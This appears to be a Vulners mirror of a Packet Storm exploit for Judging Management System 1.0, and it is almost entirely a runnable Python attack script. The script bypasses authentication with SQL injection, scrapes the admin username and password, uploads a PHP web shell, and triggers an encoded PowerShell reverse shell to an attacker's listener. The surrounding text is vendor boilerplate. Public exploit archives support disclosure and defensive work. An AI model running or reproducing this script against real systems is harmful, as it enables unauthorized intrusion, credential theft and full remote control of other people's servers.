Vulners
Lucene search
Judging Management System 1.0 Shell Upload
ποΈΒ 12 Dec 2022Β 00:00:00Reported byΒ Angelo Pio AmiranteTypeΒ 
Β packetstormπΒ packetstormsecurity.comπΒ 196Β Views
`# Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE)
# Date: 12/11/2022
# Exploit Author: Angelo Pio Amirante
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 on XAAMP server
import requests,argparse,re,time,base64
import urllib.parse
from colorama import (Fore as F,Back as B,Style as S)
from bs4 import BeautifulSoup
BANNER = """
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE) β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
"""
def argsetup():
desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)'
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True)
parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)
parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)
args = parser.parse_args()
return args
# Performs Auth bypass in order to get the admin cookie
def auth_bypass(args):
print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...")
session = requests.Session()
loginUrl = f"{args.target}/login.php"
username = """' OR 1=1-- -"""
password = "randomvalue1234"
data = {'username': username, 'password': password}
login = session.post(loginUrl,verify=False,data=data)
admin_cookie = login.cookies['PHPSESSID']
print(F.GREEN+"[+] Admin cookies obtained !!!")
return admin_cookie
# Checks if the file has been uploaded to /uploads directory
def check_file(args,cookie):
uploads_endpoint = f"{args.target}/uploads/"
cookies = {'PHPSESSID': f'{cookie}'}
req = requests.get(uploads_endpoint,verify=False,cookies=cookies)
soup = BeautifulSoup(req.text,features='html.parser')
files = soup.find_all("a")
for i in range (len(files)):
match = re.search(".*-shelljudgesystem\.php",files[i].get('href'))
if match:
file = files[i].get('href')
print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file)
return file
return None
def file_upload(args,cookie):
now = int(time.time())
endpoint = f"{args.target}/edit_organizer.php"
cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'}
get_req = requests.get(endpoint,verify=False,cookies=cookies)
soup = BeautifulSoup(get_req.text,features='html.parser')
username = soup.find("input",{"name":"username"}).get('value')
admin_password = soup.find("input",{"id":"password"}).get('value')
print(F.GREEN + "[+] Admin username: " + username)
print(F.GREEN + "[+] Admin password: " + admin_password)
# Multi-part request
file_dict = {
'fname':(None,"Random"),
'mname':(None,"Random"),
'lname':(None,"Random"),
'email':(None,"[email protected]"),
'pnum':(None,"014564343"),
'cname':(None,"Random"),
'caddress':(None,"Random"),
'ctelephone':(None,"928928392"),
'cemail':(None,"[email protected]"),
'cwebsite':(None,"http://company.com"),
'file':("shelljudgesystem.php","<?php system($_REQUEST['cmd']) ?>","application/octet-stream"),
'username':(None,f"{admin_password}"),
'passwordx':(None,f"{admin_password}"),
'password2x':(None,f"{admin_password}"),
'password':(None,f"{admin_password}"),
'update':(None,"")
}
req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict)
def exploit(args,cookie,file):
payload = f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """
uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}"
cookies = {'PHPSESSID': f'{cookie}'}
print(F.GREEN + "\n[+] Enjoy your reverse shell ")
requests.get(uploads_endpoint,verify=False,cookies=cookies)
if __name__ == '__main__':
print(F.CYAN + BANNER)
args = argsetup()
cookie=auth_bypass(args=args)
file_upload(args=args,cookie=cookie)
file_name=check_file(args=args,cookie=cookie)
if file_name is not None:
exploit(args=args,cookie=cookie,file=file_name)
else:
print(F.RED + "[!] File not found")
`
Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Dec 2022 00:00Current
7.4High risk
Vulners AI Score7.4